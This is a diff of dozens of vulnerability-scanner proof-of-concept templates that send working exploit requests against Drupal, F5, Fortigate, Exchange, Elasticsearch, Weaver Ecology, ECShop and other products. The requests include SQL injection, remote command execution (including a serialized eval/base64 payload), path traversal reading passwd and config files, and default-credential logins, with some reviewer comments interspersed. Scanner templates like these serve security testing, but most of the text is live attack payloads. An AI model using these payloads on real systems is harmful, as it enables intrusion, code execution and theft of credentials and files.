path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}}
expression: |
response.body.bcontains(bytes(r1 + "%" + r2))
detail:
drupal_version: 8
links:
- https://github.com/dreadlocked/Drupalgeddon2
- https://paper.seebug.org/567/
test:
target: http://cve-2018-7600-8-x.vulnet:8080/


@ -0,0 +1,20 @@
name: poc-yaml-dubbo-admin-default-password
groups:
root:
- method: GET
path: /
headers:
Authorization: Basic cm9vdDpyb290
expression: |
response.status == 200 && response.body.bcontains(b"<title>Dubbo Admin</title>") && response.body.bcontains(b": root', '/logout'") && response.body.bcontains(b"/sysinfo/versions")
guest:
- method: GET
path: /
headers:
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
expression: |
response.status == 200 && response.body.bcontains(b"<title>Dubbo Admin</title>") && response.body.bcontains(b": guest', '/logout'") && response.body.bcontains(b"/sysinfo/versions")
detail:
author: mumu0215(https://github.com/mumu0215)
links:
- https://www.cnblogs.com/wishwzp/p/9438658.html


@ -0,0 +1,13 @@
name: poc-yaml-duomicms-sqli
rules:
- method: GET
path: >-
/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(2000000005)))
follow_redirects: false
expression: |
response.body.bcontains(b"fc9bdfb86bae5c322bae5acd78760935")
detail:
author: hanxiansheng26(https://github.com/hanxiansheng26)
Affected Version: "duomicms<3.0"
links:
- https://xz.aliyun.com/t/2828
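Review bot: The detection marker here is a constant (`md5(2000000005)` in the path and a fixed digest in the expression), unlike the dedecms and ecology POCs on this page, which derive it from a `set:` random value. A fixed marker can be satisfied by a cached, replayed or honeypot response and is trivially signatured as a whole. Follow the sibling pattern: `set:` with `r: randomInt(800000000, 1000000000)`, `md5({{r}})` in the path, and `response.body.bcontains(bytes(md5(string(r))))` in the expression.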


@ -0,0 +1,15 @@
name: poc-yaml-dvr-cve-2018-9995
rules:
- method: GET
path: >-
/device.rsp?opt=user&cmd=list
headers:
Cookie: uid=admin
follow_redirects: true
expression: >
response.status == 200 && response.body.bcontains(bytes("\"uid\":")) && response.body.bcontains(b"playback")
detail:
author: cc_ci(https://github.com/cc8ci)
Affected Version: "DVR"
links:
- https://s.tencent.com/research/bsafe/474.html


@ -0,0 +1,10 @@
name: poc-yaml-e-zkeco-cnvd-2020-57264-read-file
rules:
- method: GET
path: /iclock/ccccc/windows/win.ini
expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support")
detail:
author: ThestaRY (https://github.com/ThestaRY7/)
links:
- https://www.cnvd.org.cn/flaw/show/CNVD-2020-57264
info: E-ZKEco readfileCNVD-2020-57264


@ -0,0 +1,11 @@
name: poc-yaml-ecology-filedownload-directory-traversal
rules:
- method: GET
path: /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"<url-pattern>/weaver/")
detail:
author: l1nk3r
links:
- https://www.weaver.com.cn/cs/securityDownload.asp


@ -0,0 +1,16 @@
name: poc-yaml-ecology-javabeanshell-rce
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
- method: POST
path: /weaver/bsh.servlet.BshServlet
body: >-
bsh.script=print%28{{r1}}*{{r2}}%29&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: l1nk3r
links:
- https://www.weaver.com.cn/cs/securityDownload.asp


@ -0,0 +1,11 @@
name: poc-yaml-ecology-springframework-directory-traversal
rules:
- method: GET
path: /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"<url-pattern>/weaver/")
detail:
author: l1nk3r
links:
- https://www.weaver.com.cn/cs/securityDownload.asp


@ -0,0 +1,15 @@
name: poc-yaml-ecology-syncuserinfo-sqli
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
- method: GET
path: >-
/mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str({{r1}}*{{r2}}),null
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: MaxSecurity(https://github.com/MaxSecurity)
links:
- https://www.weaver.com.cn/


@ -0,0 +1,15 @@
name: poc-yaml-ecology-v8-sqli
set:
r1: randomInt(1000, 9999)
r2: randomInt(1000, 9999)
rules:
- method: GET
path: /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+{{r1}}*{{r2}}+as+id
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: Print1n(http://print1n.top)
links:
- http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20V8%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html


@ -0,0 +1,19 @@
name: poc-yaml-ecology-workflowcentertreedata-sqli
set:
r1: randomInt(4000, 9999)
r2: randomInt(800, 1000)
rules:
- method: POST
path: /mobile/browser/WorkflowCenterTreeData.jsp
headers:
Content-Type: application/x-www-form-urlencoded
body: >-
node=wftype_1132232323231&scope=23332323&formids=1111111111111%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d
%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a)))union+select+1024,({{r1}}*{{r2}})+order+by+(((1
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: JingLing(https://hackfun.org/)
links:
- https://anonfiles.com/A4cede8an1/_OA_WorkflowCenterTreeData_oracle_html
- https://mp.weixin.qq.com/s/9mpvppx3F-nTQYoPdY2r3w



@ -0,0 +1,14 @@
name: poc-yaml-ecshop-collection-list-sqli
set:
r1: randomInt(10000, 99999)
rules:
- method: GET
path: /user.php?act=collection_list
headers:
X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953apay_log|s:55:"1' and updatexml(1,insert(md5({{r1}}),1,1,0x7e),1) and '";|45ea207d7a2b68c49582d2d22adf953a
follow_redirects: false
expression: response.body.bcontains(bytes(substr(md5(string(r1)), 1, 32)))
detail:
author: 曦shen
links:
- https://github.com/vulhub/vulhub/tree/master/ecshop/collection_list-sqli


@ -2,15 +2,25 @@ name: poc-yaml-ecshop-rce
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
- method: POST
path: /user.php
headers:
Referer: >-
554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
Content-Type: application/x-www-form-urlencoded
body: action=login&pp123=printf({{r1}}*{{r2}});
expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
groups:
2.x:
- method: POST
path: /user.php
headers:
Referer: >-
554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
Content-Type: application/x-www-form-urlencoded
body: action=login&pp123=printf({{r1}}*{{r2}});
expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
3.x:
- method: POST
path: /user.php
headers:
Referer: >-
45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953aads
Content-Type: application/x-www-form-urlencoded
body: action=login&pp123=printf({{r1}}*{{r2}});
expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: 凉风(http://webkiller.cn/)
links:


@ -1,17 +0,0 @@
name: poc-yaml-ecshop-rce
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
- method: POST
path: /user.php
headers:
Referer: >-
45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953aads
Content-Type: application/x-www-form-urlencoded
body: action=login&pp123=printf({{r1}}*{{r2}});
expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: 凉风(http://webkiller.cn/)
links:
- https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md


@ -0,0 +1,11 @@
name: poc-yaml-eea-info-leak-cnvd-2021-10543
rules:
- method: GET
path: "/authenticationserverservlet"
expression: |
response.status == 200 && "<username>(.*?)</username>".bmatches(response.body) && "<password>(.*?)</password>".bmatches(response.body)
detail:
author: Search?=Null
description: "MessageSolution Enterprise Email Archiving (EEA) Info Leak."
links:
- https://exp1orer.github.io


@ -0,0 +1,45 @@
name: poc-yaml-elasticsearch-cve-2014-3120
set:
r: randomInt(800000000, 1000000000)
r1: randomInt(800000000, 1000000000)
rules:
- method: POST
path: /test/test1/123
headers:
Content-Type: application/json
body: |
{
"name": "test"
}
expression: |
response.status == 201 || response.status == 200
- method: POST
path: /_search
headers:
Content-Type: application/json
body: |-
{
"size": 1,
"query": {
"filtered": {
"query": {
"match_all": {
}
}
}
},
"script_fields": {
"command": {
"script": "{{r}}+{{r1}}"
}
}
}
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r + r1)))
detail:
author: suancaiyu、violin
elasticsearch: v1.1.1
links:
- https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120
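Review bot: The first rule writes a document into the fixed index `test` (`/test/test1/123`) and no rule removes it, so a scan leaves data on the target and, where an index named `test` already exists, injects into live data; the elasticsearch-cve-2015-1427 hunk (`/test/test`) has the same problem. Take the name from `set:` as the ES snapshot and etcd POCs on this page already do, e.g. `idx: randomLowercase(8)` with `path: /{{idx}}/{{idx}}/1`, so the write cannot collide with existing data and a trailing `DELETE /{{idx}}` rule can remove exactly what the scan created. Accepting `200 || 201` on the first rule is otherwise fine.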


@ -0,0 +1,35 @@
name: poc-yaml-elasticsearch-cve-2015-1427
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
- method: POST
path: /test/test
headers:
Content-Type: application/json
body: |
{
"name": "test"
}
expression: |
response.status == 201
- method: POST
path: /_search
headers:
Content-Type: application/json
body: |
{
"size":1,
"script_fields":{
"lupin":{
"lang":"groovy",
"script":"{{r1}}*{{r2}}"
}
}
}
expression: |
response.status == 200 && response.content_type.icontains("json") && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: pululin(https://github.com/pululin)
links:
- https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-1427


@ -0,0 +1,11 @@
name: poc-yaml-elasticsearch-cve-2015-3337-lfi
rules:
- method: GET
path: /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd
expression: |
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
detail:
author: X.Yang
links:
- https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-3337


@ -0,0 +1,42 @@
name: poc-yaml-elasticsearch-cve-2015-5531
set:
r1: randomLowercase(4)
rules:
- method: PUT
path: /_snapshot/{{r1}}
headers:
Content-Type: application/x-www-form-urlencoded
body: |-
{
"type": "fs",
"settings":{
"location": "/usr/share/elasticsearch/repo/{{r1}}"
}
}
follow_redirects: true
expression: |
response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"{\"acknowledged\":true}")
- method: PUT
path: /_snapshot/{{r1}}2
headers:
Content-Type: application/x-www-form-urlencoded
body: |-
{
"type": "fs",
"settings":{
"location": "/usr/share/elasticsearch/repo/{{r1}}/snapshot-backdata"
}
}
follow_redirects: true
expression: |
response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"{\"acknowledged\":true}")
- method: GET
path: >-
/_snapshot/{{r1}}/backdata%2f..%2f..%2f..%2fconfig%2felasticsearch.yml
follow_redirects: true
expression: |
response.status == 400 && response.content_type.contains("application/json") && response.body.bcontains(b"{\"error\":\"ElasticsearchParseException[Failed to derive xcontent from")
detail:
author: ha9worm(https://github.com/ha9worm)
links:
- https://www.cnblogs.com/sallyzhang/p/12457031.html


@ -0,0 +1,29 @@
name: poc-yaml-etcd-unauth
set:
r1: randomLowercase(32)
r2: randomLowercase(32)
r3: randomLowercase(32)
rules:
- method: PUT
path: /v2/keys/{{r1}}?dir=true
follow_redirects: false
expression: |
response.status == 201
- method: PUT
path: /v2/keys/{{r1}}/{{r2}}?prevExist=false
headers:
Content-Type: application/x-www-form-urlencoded
body: value={{r3}}
follow_redirects: false
expression: |
response.status == 201
- method: GET
path: /v2/keys/{{r1}}/{{r2}}?quorum=false&recursive=false&sorted=false
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(r3))
detail:
author: j4ckzh0u(https://github.com/j4ckzh0u)
links:
- https://www.freebuf.com/news/196993.html


@ -0,0 +1,12 @@
name: poc-yaml-etouch-v2-sqli
rules:
- method: GET
path: >-
/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)'
expression: |
response.status == 200 && response.body.bcontains(b"c4ca4238a0b923820dcc509a6f75849b")
detail:
author: MaxSecurity(https://github.com/MaxSecurity)
links:
- https://github.com/mstxq17/CodeCheck/
- https://www.anquanke.com/post/id/168991


@ -6,7 +6,7 @@ rules:
Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
follow_redirects: false
expression: |
"X-CalculatedBETarget" in response.headers && response.headers["X-CalculatedBETarget"].icontains("localhost")
response.headers["X-CalculatedBETarget"].icontains("localhost")
detail:
author: sharecast
Affected Version: "Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010"
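Review bot: If the second expression line `response.headers["X-CalculatedBETarget"].icontains("localhost")` is the new side, it drops the `"X-CalculatedBETarget" in response.headers` guard, so a response without that header turns the lookup into an access of a missing map key instead of evaluating to false. In CEL, indexing a map with an absent key is an evaluation error, and whether the scanner treats such an error as a non-match is not visible here, so the guarded form `"X-CalculatedBETarget" in response.headers && response.headers["X-CalculatedBETarget"].icontains("localhost")` is the safer choice. The rule's remaining fields start above this hunk.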


@ -1,4 +1,4 @@
name: poc-yaml-eyou-rce
name: poc-yaml-eyou-email-system-rce
set:
r1: randomInt(800000000, 1000000000)
r2: randomInt(800000000, 1000000000)
@ -7,9 +7,12 @@ rules:
path: /webadm/?q=moni_detail.do&action=gragh
headers:
Content-Type: application/x-www-form-urlencoded
body: type='|expr {{r1}} + {{r2}}||'
expression: response.body.bcontains(bytes(string(r1 + r2)))
body: |
type='|expr%20{{r1}}%20%2B%20{{r2}}||'
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
detail:
author: jingling(https://github.com/shmilylty)
author: Print1n(http://print1n.top)
description: 亿邮电子邮件系统 远程命令执行漏洞
links:
- https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
- https://fengchenzxc.github.io/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E4%BA%BF%E9%82%AE/%E4%BA%BF%E9%82%AE%E7%94%B5%E5%AD%90%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/


@ -0,0 +1,20 @@
name: poc-yaml-f5-cve-2021-22986
set:
r1: randomInt(800000000, 1000000000)
r2: randomInt(800000000, 1000000000)
rules:
- method: POST
path: /mgmt/tm/util/bash
headers:
Content-Type: application/json
Authorization: Basic YWRtaW46
X-F5-Auth-Token: " "
body: >-
{"command":"run","utilCmdArgs":"-c 'expr {{r1}} + {{r2}}'"}
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
detail:
author: Hex
links:
- https://support.f5.com/csp/article/K03009991


@ -0,0 +1,10 @@
name: poc-yaml-feifeicms-lfr
rules:
- method: GET
path: /index.php?s=Admin-Data-down&id=../../Conf/config.php
expression: |
response.status == 200 && response.body.bcontains(b"<?php") && response.body.bcontains(b"db_name") && response.body.bcontains(b"db_pwd") && response.body.bcontains(b"db_host")
detail:
author: jinqi
links:
- https://www.cnblogs.com/jinqi520/p/10202615.html


@ -0,0 +1,13 @@
name: poc-yaml-finecms-sqli
set:
rand: randomInt(200000000, 210000000)
rules:
- method: GET
path: /index.php?c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df&param=action=sql%20sql=%27select%20md5({{rand}})%27
expression: |
response.body.bcontains(bytes(md5(string(rand))))
detail:
author: Rexus
Affected Version: "5.0.10"
links:
- https://blog.csdn.net/dfdhxb995397/article/details/101385340


@ -0,0 +1,11 @@
name: poc-yaml-finereport-directory-traversal
rules:
- method: GET
path: /report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"<rootManagerName>") && response.body.bcontains(b"<rootManagerPassword>")
detail:
author: l1nk3r(http://www.lmxspace.com/)
links:
- http://foreversong.cn/archives/1378


@ -0,0 +1,38 @@
name: poc-yaml-flexpaper-cve-2018-11686
set:
fileName: randomLowercase(6)
verifyStr: randomLowercase(6)
rules:
- method: POST
path: /php/change_config.php
headers:
Content-Type: application/x-www-form-urlencoded
body: |
SAVE_CONFIG=1&PDF_Directory=a&SWF_Directory=config/&LICENSEKEY=a&SPLITMODE=a&RenderingOrder_PRIM=a&RenderingOrder_SEC=a
expression: |
response.status == 302 || response.status == 200
- method: POST
path: /php/change_config.php
headers:
Content-Type: application/x-www-form-urlencoded
body: |
SAVE_CONFIG=1&PDF_Directory=a&SWF_Directory=config/&LICENSEKEY=a&SPLITMODE=a&RenderingOrder_PRIM=a&RenderingOrder_SEC=a
expression: |
response.status == 302 || response.status == 200
- method: GET
path: >-
/php/setup.php?step=2&PDF2SWF_PATH=printf%20{{verifyStr}}%25%25{{verifyStr}}%20%3e%20{{fileName}}
follow_redirects: false
expression: |
response.status == 200
- method: GET
path: >-
/php/{{fileName}}pdf2swf
expression: |
response.status == 200 && response.body.bcontains(bytes(string(verifyStr + "%" + verifyStr)))
detail:
author: Soveless(https://github.com/Soveless)
Affected Version: "FlexPaper <= 2.3.6"
links:
- https://github.com/mpgn/CVE-2018-11686
- https://cloud.tencent.com/developer/article/1472550


@ -0,0 +1,10 @@
name: poc-yaml-flink-jobmanager-cve-2020-17519-lfi
rules:
- method: GET
path: /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
expression: |
response.status == 200 && "^root:[x*]:0:0:".bmatches(response.body)
detail:
author: MaxSecurity(https://github.com/MaxSecurity)
links:
- https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519


@ -1,11 +0,0 @@
name: poc-yaml-flir-ax8-file-read
rules:
- method: GET
path: "/download.php?file=/etc/passwd"
follow_redirects: false
expression: |
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
detail:
author: Print1n(http://print1n.top)
links:
- https://juejin.cn/post/6961370156484263972


@ -0,0 +1,13 @@
name: poc-yaml-fortigate-cve-2018-13379-readfile
rules:
- method: GET
path: "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
headers:
Content-Type: application/x-www-form-urlencoded
follow_redirects: true
expression: response.body.bcontains(bytes("fgt_lang")) && response.body.bcontains(bytes("Forticlient"))
detail:
author: tom0li(https://tom0li.github.io/)
links:
- https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
